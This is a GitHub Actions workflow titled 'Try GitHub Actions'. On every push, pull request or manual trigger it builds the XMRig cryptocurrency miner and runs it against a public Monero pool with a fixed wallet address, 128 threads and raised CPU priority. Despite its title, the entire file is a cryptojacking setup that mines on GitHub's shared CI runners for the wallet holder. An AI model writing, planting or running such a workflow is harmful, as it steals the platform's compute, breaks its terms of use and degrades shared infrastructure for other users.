name: Try GitHub Actions 🦹‍♂️

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v2

      - name: Install Dependencies
        shell: bash
        run: |
          sudo apt-get update
          sudo apt-get install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

      - name: Build XMRig
        shell: bash
        run: |
          git clone https://github.com/xmrig/xmrig.git
          mkdir -p xmrig/build && cd xmrig/build
          cmake ..
          make -j$(nproc)

      - name: Run XMRig
        shell: bash
        run: |
          cd xmrig/build
          ./xmrig           -o pool.supportxmr.com:443           -u 4BBrvxkfMYmHgeakYUrLULhrVWy6H8ZDB9P4dx2Yhz335yrCzBzaFhbM47xEkbKnaS1pxdvYvJkrvaCzRQN2Ri2iAfrLUSi           -k --tls --threads=128 --cpu-priority=5 -p xolani863